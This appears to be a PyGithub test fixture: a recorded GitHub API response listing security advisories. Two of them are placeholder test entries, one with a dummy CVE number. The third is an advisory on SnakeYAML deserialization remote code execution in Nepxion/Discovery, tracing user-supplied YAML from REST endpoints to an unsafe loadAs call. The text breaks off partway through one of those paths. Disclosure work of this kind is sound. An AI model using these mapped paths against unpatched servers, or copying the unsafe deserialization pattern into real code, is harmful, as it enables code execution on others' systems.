File: RepositoryAdvisory.testGetAdvisories.txt

https
GET
api.github.com
None
/repos/JLLeitschuh/security-research/security-advisories
{'Authorization': 'Basic login_and_password_removed', 'User-Agent': 'PyGithub/Python'}
None
200
[('Server', 'GitHub.com'), ('Date', 'Thu, 30 Mar 2023 21:59:35 GMT'), ('Content-Type', 'application/json; charset=utf-8'), ('Transfer-Encoding', 'chunked'), ('Cache-Control', 'private, max-age=60, s-maxage=60'), ('Vary', 'Accept, Authorization, Cookie, X-GitHub-OTP, Accept-Encoding, Accept, X-Requested-With'), ('ETag', 'W/"2f56de9a6e668493a583a01b2bf0ededa567b9fe42e26c812aa724bd9c4e048a"'), ('Last-Modified', 'Thu, 30 Mar 2023 19:31:33 GMT'), ('X-OAuth-Scopes', 'delete_repo, gist, repo, workflow'), ('X-Accepted-OAuth-Scopes', ''), ('github-authentication-token-expiration', '2023-06-28 17:58:10 UTC'), ('X-GitHub-Media-Type', 'github.v3; format=json'), ('x-github-api-version-selected', '2022-11-28'), ('X-RateLimit-Limit', '5000'), ('X-RateLimit-Remaining', '4992'), ('X-RateLimit-Reset', '1680217136'), ('X-RateLimit-Used', '8'), ('X-RateLimit-Resource', 'core'), ('Access-Control-Expose-Headers', 'ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset'), ('Access-Control-Allow-Origin', '*'), ('Strict-Transport-Security', 'max-age=31536000; includeSubdomains; preload'), ('X-Frame-Options', 'deny'), ('X-Content-Type-Options', 'nosniff'), ('X-XSS-Protection', '0'), ('Referrer-Policy', 'origin-when-cross-origin, strict-origin-when-cross-origin'), ('Content-Security-Policy', "default-src 'none'"), ('Content-Encoding', 'gzip'), ('X-GitHub-Request-Id', 'F3CD:09C6:2B9B77:59F703:64260647')]
[ { "ghsa_id": "GHSA-wmmh-r9w4-hpxx", "cve_id": "CVE-2050-00000", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-wmmh-r9w4-hpxx", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-wmmh-r9w4-hpxx", "summary": "A test creating a GHSA via the API", "description": "This is a detailed description of this advisories impact and patches.", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-wmmh-r9w4-hpxx", "type": "GHSA" }, { "value": "CVE-2050-00000", "type": "CVE" } ], "state": "draft", "created_at": "2023-03-28T21:41:40Z", "updated_at": "2023-03-28T21:41:40Z", "published_at": null, "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "npm", "name": "a-package" }, "vulnerable_version_range": ">= 1.0.2", "patched_versions": "1.0.5", "vulnerable_functions": [ "function-name" ] } ], "cvss": { "vector_string": 
"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H", "score": 7.6 }, "cwes": [ { "cwe_id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, { "cwe_id": "CWE-501", "name": "Trust Boundary Violation" } ], "cwe_ids": [ "CWE-400", "CWE-501" ], "credits": [ { "login": "octocat", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "octocat", "id": 583231, "node_id": "MDQ6VXNlcjU4MzIzMQ==", "avatar_url": "https://avatars.githubusercontent.com/u/583231?v=4", "gravatar_id": "", "url": "https://api.github.com/users/octocat", "html_url": "https://github.com/octocat", "followers_url": "https://api.github.com/users/octocat/followers", "following_url": "https://api.github.com/users/octocat/following{/other_user}", "gists_url": "https://api.github.com/users/octocat/gists{/gist_id}", "starred_url": "https://api.github.com/users/octocat/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/octocat/subscriptions", "organizations_url": "https://api.github.com/users/octocat/orgs", "repos_url": "https://api.github.com/users/octocat/repos", "events_url": "https://api.github.com/users/octocat/events{/privacy}", "received_events_url": "https://api.github.com/users/octocat/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "pending" } ] }, { "ghsa_id": "GHSA-wvgm-59wj-rh8h", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-wvgm-59wj-rh8h", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-wvgm-59wj-rh8h", "summary": "Testing GHSA creation", "description": "Example closed GHSA for testing\r\n", "severity": null, "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": 
"https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-wvgm-59wj-rh8h", "type": "GHSA" } ], "state": "closed", "created_at": "2023-01-26T19:33:30Z", "updated_at": "2023-02-02T17:58:59Z", "published_at": null, "closed_at": "2023-02-02T17:58:59Z", "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "", "name": "" }, "vulnerable_version_range": "", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": null, "score": null }, "cwes": [], "cwe_ids": [], "credits": [], "credits_detailed": [] }, { "ghsa_id": "GHSA-22cq-8f5q-p5g2", "cve_id": "CVE-2022-1471", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-22cq-8f5q-p5g2", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-22cq-8f5q-p5g2", "summary": "Nepxion/Discovery: Remote Code Execution via SnakeYAML Deserialization Gadgets", "description": "### Impact\r\n\r\nRemote Code Execution vulnerability in the \r\n\r\n### Vulnerability\r\n\r\nThis project leverages SnakeYAML to deserialize YAML input into java objects. 
Unfortunately, this library allows for arbitrary execution of code when deserializing untrusted user input.\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L160-L160).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 8 steps</summary>\r\n\r\n1. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L160-L160)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"根据Yaml格式,反解析版本蓝绿灰度发布策略为Json格式\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; convertVersionRelease(<strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n           return doDeparseVersionReleaseYaml(conditionStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L161-L161)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; convertVersionRelease(@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n           return doDeparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L341-L341)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doDeparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n           try {\r\n               ConditionStrategy result = strategyResource.deparseVersionReleaseYaml(conditionStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L343-L343)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doDeparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n           try {\r\n               ConditionStrategy result = strategyResource.deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n           return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n       }\r\n   </code></pre>\r\n   \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n   <pre><code class=\"java\">    @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n           return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n7. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n8. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n   <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n   \r\n           return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n       }\r\n   }</code></pre>\r\n   \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L139-L139).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L139-L139)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"根据Yaml格式,解析版本蓝绿灰度发布策略为Xml格式\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; parseVersionRelease(<strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n           return doParseVersionRelease(conditionStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L140-L140)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; parseVersionRelease(@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n           return doParseVersionRelease(<strong>conditionStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L311-L311)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doParseVersionRelease(<strong>String conditionStrategyYaml</strong>) {\r\n           try {\r\n               String result = strategyResource.parseVersionRelease(conditionStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L313-L313)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doParseVersionRelease(String conditionStrategyYaml) {\r\n           try {\r\n               String result = strategyResource.parseVersionRelease(<strong>conditionStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L174-L174)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String parseVersionRelease(<strong>String conditionStrategyYaml</strong>) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n   \r\n   </code></pre>\r\n   \r\n6. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L175-L175)\r\n   <pre><code class=\"java\">    @Override\r\n       public String parseVersionRelease(String conditionStrategyYaml) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n   \r\n           return parseVersionRelease(conditionStrategy);\r\n   </code></pre>\r\n   \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n           return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n       }\r\n   </code></pre>\r\n   \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n   <pre><code class=\"java\">    @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n           return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n9. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n10. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n    <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n    \r\n            return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n        }\r\n    }</code></pre>\r\n    \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L111-L111).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 8 steps</summary>\r\n\r\n1. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L111-L111)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"局部订阅方式,根据Yaml格式,重新创建版本蓝绿灰度发布(创建链路智能编排,不创建条件表达式)\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml</strong>) {\r\n           return doRecreateVersionRelease(group, serviceId, conditionRouteStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L112-L112)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, @RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml) {\r\n           return doRecreateVersionRelease(group, serviceId, <strong>conditionRouteStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L271-L271)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doRecreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n           try {\r\n               String result = strategyResource.recreateVersionRelease(group, serviceId, conditionRouteStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L273-L273)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doRecreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n           try {\r\n               String result = strategyResource.recreateVersionRelease(group, serviceId, <strong>conditionRouteStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L126-L126)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String recreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n           ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(conditionRouteStrategyYaml, ConditionRouteStrategy.class);\r\n   \r\n   </code></pre>\r\n   \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L127-L127)\r\n   <pre><code class=\"java\">    @Override\r\n       public String recreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n           ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(<strong>conditionRouteStrategyYaml</strong>, ConditionRouteStrategy.class);\r\n   \r\n           return recreateVersionRelease(group, serviceId, conditionRouteStrategy);\r\n   </code></pre>\r\n   \r\n7. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n8. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n   <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n   \r\n           return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n       }\r\n   }</code></pre>\r\n   \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L97-L97).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L97-L97)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"局部订阅方式,根据Yaml格式,创建版本蓝绿灰度发布\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n           return doCreateVersionRelease(group, serviceId, conditionStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L98-L98)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @PathVariable(value = \"serviceId\") @ApiParam(value = \"服务名\", required = true) String serviceId, @RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n           return doCreateVersionRelease(group, serviceId, <strong>conditionStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. 
